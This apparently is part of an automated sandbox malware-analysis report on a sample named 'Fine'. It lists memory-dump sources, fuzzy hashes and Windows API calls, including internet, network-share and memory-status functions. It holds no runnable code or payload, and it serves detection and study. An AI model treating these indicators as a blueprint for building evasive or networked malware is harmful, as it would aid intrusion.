                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f58b0d6ec1ff1c959f67bbd9b0842c4681185deb9d9e5d2ab66b70ca928d803
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 80efb2c97b5c4584b65e20d2e40b98623e4d25bce2d3d4e05dd2b9e860164f09
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f58b0d6ec1ff1c959f67bbd9b0842c4681185deb9d9e5d2ab66b70ca928d803
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95E01A74D00208EFCF40AFA1E90CA5DBBF5EB18311F20C40AE80AE3290C7B85901AF01
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0022EC4A
                                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0022EC54
                                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0022EC60
                                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?), ref: 0022EC81
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 440670cecfec6e3304a0471e69bd581b970f872bcc1dc1ee33b7e0ba0e573586
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f046051af84f7d52d76a4f2d34e64c564ba1c4fdc8189042eca25d9fd7b139ab
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 440670cecfec6e3304a0471e69bd581b970f872bcc1dc1ee33b7e0ba0e573586
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49E09A75D00208DFCF519FA1E94CA5DBBF5AB58311F10C459E94AE7290C7B969019F11
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                                                                            • String ID: @COM_EVENTOBJ$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 2948472770-2369506278
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a667fde45e4ab81717db1a315029cf6726b21c0b2294b51f719a3dda0f2100e0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a65c6612e55d422f3133331200b8b5d8ee378e3c97a2999493fe2a5ce4dfb80
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a667fde45e4ab81717db1a315029cf6726b21c0b2294b51f719a3dda0f2100e0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AF1ED70A18315EFCB24DF54D881B6AB3E1BF94304F10881DF58A9B261C779EA65CF82
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F05B2: EnterCriticalSection.KERNEL32(002A170C,?,00000000,?,001DD22A,002A3570,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?), ref: 001F05BD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F05B2: LeaveCriticalSection.KERNEL32(002A170C,?,001DD22A,002A3570,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?,00000001,002A2430), ref: 001F05FA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0413: __onexit.LIBCMT ref: 001F0419
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00258658
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0568: EnterCriticalSection.KERNEL32(002A170C,00000000,?,001DD258,002A3570,002127C9,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?), ref: 001F0572
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F0568: LeaveCriticalSection.KERNEL32(002A170C,?,001DD258,002A3570,002127C9,00000001,00000000,?,?,0024F023,?,?,00000000,00000001,?,00000001), ref: 001F05A5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.$bn#
                                                                                                                                                                                                                                                                                                                            • API String ID: 535116098-3746618543
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 412ec7a90eb3c64c5c3c0ec4998f616500fcfa46fe2f7bf95fd24c1d55f7b3d7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a453b750916e0f1559cbdcb6ce39b40b64cca014bf0226d593e6d5ea889b9e6f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 412ec7a90eb3c64c5c3c0ec4998f616500fcfa46fe2f7bf95fd24c1d55f7b3d7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8919E74A20209EFCB04EF54D885DADB7B1FF49301F508059FD06AB292DBB1AE69CB54
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
                                                                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00245919
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: *$LPT
                                                                                                                                                                                                                                                                                                                            • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ff3b34553b60c485e6fa90841b8907e4b1b5effed2985141c95c5d0b5fe31e04
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0fa7a002b6d409fb09a4ec3c43998e22065961489a3c822d6166ebe4f4b96eac
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff3b34553b60c485e6fa90841b8907e4b1b5effed2985141c95c5d0b5fe31e04
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6919F75A10625DFCB18DF54C484EAABBF1AF44304F188099E8899F363C771EE85CB90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 002358AF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                                            • String ID: 0$*$Container
                                                                                                                                                                                                                                                                                                                            • API String ID: 3565006973-2464499141
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d3669e33ccb14329f488659e5cc9fa11579cd7085088779196bb6b55e50a048b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fc3bdc8125f7c67bb029a1e52ba60160f50ef82a340672a6067096b12fd4dc1a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3669e33ccb14329f488659e5cc9fa11579cd7085088779196bb6b55e50a048b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE8128B0610611EFDB14DF58C884B6ABBF9FF49710F10856EF94A8B291DBB0E855CB90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 001FE67D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f39e07c8702f676672f068ab9491ae97999dbfdfdb4f28edfee054863f76c379
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 32a55475ea85a96e7a7f394033d53545c668950ba723b5d8332b61da6973799d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f39e07c8702f676672f068ab9491ae97999dbfdfdb4f28edfee054863f76c379
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44517971E2820A86C715BB14DD0137BBBE4AF50B50F204D58F1D9822FAEF358DE59E86
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: #
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 50704ae1a2495967239e2d38c50e450a96cc0511d8431574c0a3e7c212642018
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 40f748d1f883988f7d570c4b7673db524b711c6ea4f58af24bad8f4692dd03b6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50704ae1a2495967239e2d38c50e450a96cc0511d8431574c0a3e7c212642018
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23516634506297EFCB24EF68E040ABE3BA4AF21314FA54015F8819B2D1DB34ED92C761
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 001EF6DB
                                                                                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 001EF6F4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0024DB75
                                                                                                                                                                                                                                                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0024DB7F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                                                                            • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 002640BD
                                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002640F8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                                                            • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002650BD
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002650D2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001D24B0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00213440
                                                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002134CA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2181805148-1658319840
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001D78B1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: GetStockObject.GDI32(00000011), ref: 001D78C5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001D78CF
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00264216
                                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00264230
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0024D7C2
                                                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0024D7EB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
